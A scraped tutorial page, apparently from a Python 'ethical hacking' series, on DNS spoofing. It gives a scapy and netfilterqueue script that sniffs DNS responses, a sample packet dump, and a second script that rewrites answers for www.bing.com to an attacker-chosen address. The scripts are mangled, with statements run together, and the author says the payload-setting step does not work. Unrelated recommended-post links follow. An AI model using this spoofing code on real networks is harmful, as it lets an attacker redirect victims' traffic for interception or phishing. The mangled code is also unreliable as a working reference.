What is DNS Spoofing

Sniff the DNSRR packet and show on the terminal.

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue
from scapy.layers.dns import DNSRR,IP def process_packet(packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(DNSRR):
print(scapy_packet.show())
packet.accept() queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
queue.run()
except KeyboardInterrupt:
print('')

Analyze the following DNSRR records.

###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 218
id = 0
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0x25e8
src = 10.0.0.1
dst = 10.0.0.43
\options \
###[ UDP ]###
sport = domain
dport = 42647
len = 198
chksum = 0x9388
###[ DNS ]###
id = 40073
qr = 1
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 1
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 3
nscount = 1
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'www.bing.com.'
| qtype = AAAA
| qclass = IN
\an \
|###[ DNS Resource Record ]###
| rrname = 'www.bing.com.'
| type = CNAME
| rclass = IN
| ttl = 2063
| rdlen = None
| rdata = 'a-0001.a-afdentry.net.trafficmanager.net.'
|###[ DNS Resource Record ]###
| rrname = 'a-0001.a-afdentry.net.trafficmanager.net.'
| type = CNAME
| rclass = IN
| ttl = 414
| rdlen = None
| rdata = 'cn.cn-0001.cn-msedge.net.'
|###[ DNS Resource Record ]###
| rrname = 'cn.cn-0001.cn-msedge.net.'
| type = CNAME
| rclass = IN
| ttl = 38
| rdlen = None
| rdata = 'cn-0001.cn-msedge.net.'
\ns \
|###[ DNS SOA Resource Record ]###
| rrname = 'cn-msedge.net.'
| type = SOA
| rclass = IN
| ttl = 38
| rdlen = None
| mname = 'ns1.cn-msedge.net.'
| rname = 'msnhst.microsoft.com.'
| serial = 2017032701
| refresh = 1800
| retry = 900
| expire = 2419200
| minimum = 240
ar = None

Redirecting DNS Responses

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue
from scapy.layers.dns import * def process_packet(packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(DNSQR):
qname = scapy_packet[DNSQR].qname
if "www.bing.com" in qname.decode(errors='ignore'):
print("[+] Spoofing target")
answer = DNSRR(rrname=qname, rdata="10.0.0.43")
scapy_packet[DNS].an = answer
scapy_packet[DNS].ancount = 1 del scapy_packet[IP].len
del scapy_packet[IP].chksum
del scapy_packet[UDP].chksum
del scapy_packet[UDP].len packet.set_payload(str(scapy_packet).encode()) packet.accept() queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
queue.run()
except KeyboardInterrupt:
print('')

The set_payload() method does not work....

https://github.com/kti/python-netfilterqueue/issues/30

Python Ethical Hacking - DNS Spoofing的更多相关文章

  1. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  2. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  3. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  4. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  5. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

  6. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  7. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  8. Python Ethical Hacking - MAC Address & How to Change(2)

    FUNCTIONS Set of instructions to carry out a task. Can take input, and return a result. Make the cod ...

  9. Python Ethical Hacking - MAC Address & How to Change(1)

    MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...

随机推荐

  1. beego register db `default`, sql: unknown driver "mysql" (forgotten import?)

    首先先去你的目录下找找这个文件里有没有东西,或者有没有这个文件 如果没有 执行下面两个命令: 下载:go get github.com/Go-SQL-Driver/MySQL 安装:go instal ...

  2. laravel查询常用的方式含义.

    find($id) 传值并返回一个模型.如果不存在匹配的模型,则返回null.findOrFail($id) 传值并返回一个模型.如果不存在匹配的模型, 它会抛出异常.first() 返回在数据库中找 ...

  3. router-view中绑定key='$route.fullPath'

    原文链接https://www.jianshu.com/p/cf2fb443620f 来源:简书 作者:myzony 不设置 router-view 的 key 属性 由于 Vue 会复用相同组件, ...

  4. OS_页面置换算法:C++实现

    一.实验目的: 通过模拟实现请求页式存储管理的几种基本页面置换算法,了解虚拟存储技术的特点,掌握虚拟存储请求页式存储管理中几种页面置换算法的基本思想和实现过程,并比较它们的效率. 二.实验内容: 本实 ...

  5. spring 整合redis集群中使用@autowire无效问题的解决办法

    1.视频参考黑马32期宜立方商城第6课 redis对于的代码 我们先变向一个redis客户端的接口文件 package com.test; public interface JedisClient { ...

  6. Python三大器之生成器

    Python三大器之生成器 生成器初识 什么是生成器 生成器本身属于迭代器.继承了迭代器的特性,惰性求值,占用内存空间极小. 为什么要有生成器 我们想使用迭代器本身惰性求值的特点创建出一个可以容纳百万 ...

  7. Python3-socket模块-低级网络接口

    Python3中的socket模块提供了对访问套接字(socket)的接口 socket可以理解为是一个管道,通过这个管道可以使两个不同的程序通过网络进行通信,在Python中的scoket()函数可 ...

  8. 计算机网络之tcp四次挥手

    TCP的四次挥手(Four-Way Wavehand)1.前言对于"三次握手"我们耳熟能详,因为其相对的简单.但是,我们却不常听见“四次挥手”,就算听过也未必能详细地说明白它的具体 ...

  9. 入门大数据---Spark累加器与广播变量

    一.简介 在 Spark 中,提供了两种类型的共享变量:累加器 (accumulator) 与广播变量 (broadcast variable): 累加器:用来对信息进行聚合,主要用于累计计数等场景: ...

  10. python+opencv实现图像自适应阈值的均衡化

    内容涉及:列表遍历,图像均衡化,图像通道分离与合并 import cv2 import numpy as np import os for path in open("org_junheng ...